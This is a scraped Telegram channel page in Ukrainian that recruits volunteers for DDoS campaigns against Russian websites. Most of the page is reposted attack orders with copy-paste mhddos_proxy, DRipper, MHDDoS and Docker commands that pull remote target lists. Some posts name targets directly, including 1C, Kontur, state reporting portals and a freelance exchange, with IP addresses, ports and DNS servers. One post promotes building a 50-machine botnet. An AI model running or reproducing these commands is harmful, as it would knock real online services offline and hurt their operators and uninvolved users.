За рідну Україну!
Прошу усіх, розповсюджуйте цю групу своїм знайомим, чим більше нас, тим більше шансів вбити наглухо усі російські сайти! Кидайте посилання у студентські групи університетів, шкіл! Слава Україні!
نمایش بیشترکشور مشخص نشده استزبان مشخص نشده استدسته بندی مشخص نشده است
179مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز
- مشترکین
- پوشش پست
- ER - نسبت تعامل
در حال بارگیری داده...
معدل نمو المشتركين
در حال بارگیری داده...
Repost from Кібер-Козаки
🔥Атакуємо багато різних сайтів РФ на тему 9-го травня🔥
сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET POST --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug
✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo:
🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp -t 3000 --rpc 3000 --debug
🟢DRipper (вийшла нова версія):
🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp
🟢Docker (DRipper) Windows / Для Linux додайте sudo:
🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/9may/9may_l4_tcp
💙Погнали - дамо їм жару💛Repost from Кібер-Козаки
🔥Як тему вихідного дня у цей раз візьмемо інтернет-магазини (про ЕГАИС теж не забули - вони є у конфігу)🔥
сам конфіг з усіма цілями для ознайомлення можете глянути тут: https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug
✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo:
🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url -t 3000 --rpc 3000 --http-methods GET STRESS --debug
🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp -t 3000 --rpc 3000 --debug
🟢DRipper (вийшла нова версія):
🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url
🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp
🟢Docker (DRipper) Windows / Для Linux додайте sudo:
🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l7_url
🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list
https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/shop/shop_l4_tcp
💙Погнали - дамо їм жару💛Repost from Кібер-Козаки
🔥Сьогодні атакуємо тендери РФ 🔥
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
❗️DDoS рашистів через телеграм: https://t.me/ddos_separ/1177
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url -t 4000 --rpc 4000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp -t 4000 --rpc 4000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l7_url🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/tender/tender_l4_tcp💙Погнали - дамо їм жару💛
Автоматичний DDoS new
АВТОМАТИЧНИЙ DDOS НА WINDOWS / MAC / ANROID / LINUX (ОСНОВА + СЕРВЕР(навіть при вимкненому комп’ютері)) Стаття створенна, щоб зібрати основні автоматичні методи ДДоСу, та, щоб кожен користувач міг зробити великий БотНет на 50 машин
Repost from Кібер-Козаки
🔥Сьогодні переключаємося на атаку тендерів та торгів (ЕГАИС також додано у конфіги)🔥
Repost from Кібер-Козаки
🔥Атакуємо звітність 1C в РФ🔥
❗️Ці цілі також додані у наші автоматизовані скрипти, які самостійно оновлюються, тобто для них вам міняти нічого не потрібно
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN, щоб ваш провайдер не різав трафік через підключення до багатьох ІР(проксі)
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + розвідка цілей) тепер зібрано тут
❗️Щоб додати ваш поточний ІР (або ІР підключеного VPN) до атаки разом з проксі у кінець команди приписуйте
--vpn
, більше детально про це тут: https://t.me/ddos_separ/1172
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp💙Погнали - дамо їм жару💛
Repost from Кібер-Козаки
🔥До конфігу цілей по звітності додано ще й ЕГАИС, тому продовжуємо атаку і сьогодні🔥
Repost from Кібер-Козаки
🔥Атакуємо звітність 1C в РФ🔥
https://1c.ru/
https://downloads.v8.1c.ru
https://login.1c.ru/login
https://reputils.1c.ru
https://invitations.1c-edo.keydisk.ru/
http://online.1c.ru/catalog/products/
https://1csoft.ru/wherebuy
https://www.cryptopro.ru/downloads
https://regservice.keydisk.ru
http://regservice.keydisk.ru:8092
https://service.fsrar.ru
http://frap.fsrar.ru
http://gibdd.fsrar.ru/
https://service.alcolicenziat.ru/auth/login
http://f4.fss.ru
http://docs.fss.ru
https://lk.fss.ru
https://websbor.gks.ru/online
https://online.gks.ru/online
https://updateids2.infotecs.ru
https://kontur.ru
https://auth.kontur.ru/
https://ofd.kontur.ru
❗️Ці цілі також додані у наші автоматизовані скрипти
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут
❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990
(для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно)
❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp💙Погнали - дамо їм жару💛
Repost from Кібер-Козаки
🔥Атакуємо звітність 1C в РФ🔥
https://1c.ru/
https://downloads.v8.1c.ru
https://login.1c.ru/login
https://reputils.1c.ru
https://invitations.1c-edo.keydisk.ru/
http://online.1c.ru/catalog/products/
https://1csoft.ru/wherebuy
https://www.cryptopro.ru/downloads
https://regservice.keydisk.ru
http://regservice.keydisk.ru:8092
https://service.fsrar.ru
http://frap.fsrar.ru
http://gibdd.fsrar.ru/
https://service.alcolicenziat.ru/auth/login
http://f4.fss.ru
http://docs.fss.ru
https://lk.fss.ru
https://websbor.gks.ru/online
https://online.gks.ru/online
https://updateids2.infotecs.ru
https://kontur.ru
https://auth.kontur.ru/
https://ofd.kontur.ru
❗️Ці цілі також додані у наші автоматизовані скрипти
❗️Інструкції як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990
❗️Рекомендую усім перейти на новий супер-швидкий та стабільний VPN
❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут
❗️Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990
(для Linux-серверів та авто-скриптів нічого не потрібно змінювати - воно оновлюється повністю самостійно)
❗️Ви можете допомогти нам у зборі проксі (це безкоштовно і не відніме у вас більше 30 хвилин часу на день): https://t.me/ddos_separ/1164
✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):
🔹ПРІОРИТЕТ атака по L7 URL:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug✅Docker (mhddos_proxy) Windows / Для Linux додайте sudo: 🔹ПРІОРИТЕТ Атака по L7 URL:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http -t 2500 --rpc 2000 --http-methods GET STRESS --debug🔹Атака по L4 tcp:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp -t 2500 --rpc 2000 --debug🟢DRipper (вийшла нова версія): 🔸Атака по L7 URL:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp🟢Docker (DRipper) Windows / Для Linux додайте sudo: 🔸Атака по L7 URL:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_url🔸Атака по L7 http(s)://IP:PORT:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l7_http🔸Атака по L4 tcp:
docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/1c/1c_l4_tcp💙Погнали - дамо їм жару💛
Repost from Кібер-Козаки
🔥Знайшли таку інформацію по звітності, тому атакуємо сьогодні їх звітність знову🔥
Repost from Гайдамаки InfoDDoS-2
Знову всіх вітаю, сподіваюсь, ви готові?😏
Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬
freten.ru
robroy.ru
37.46.131.229
[21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт*
[53/UDP, 123/UDP]
mail.freten.ru
mail.robroy.ru
37.46.131.229
[25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта*
82.146.43.2
94.250.248.160
[53/UDP] —> DNS-servers*
Команда для Docker:
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команда для mhddos_proxy:
python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py
-c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table
python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table
Команди для MHDDoS:
python3 start.py UDP 37.46.131.229:53 5000 10000 true python3 start.py UDP 94.250.248.160:53 5000 10000 true python3 start.py UDP 82.146.43.2:53 5000 10000 true python3 start.py UDP 37.46.131.229:123 5000 10000 true(тут синхронізація часу(123 порт), тому не пріорітетна команда)*
python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true
python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true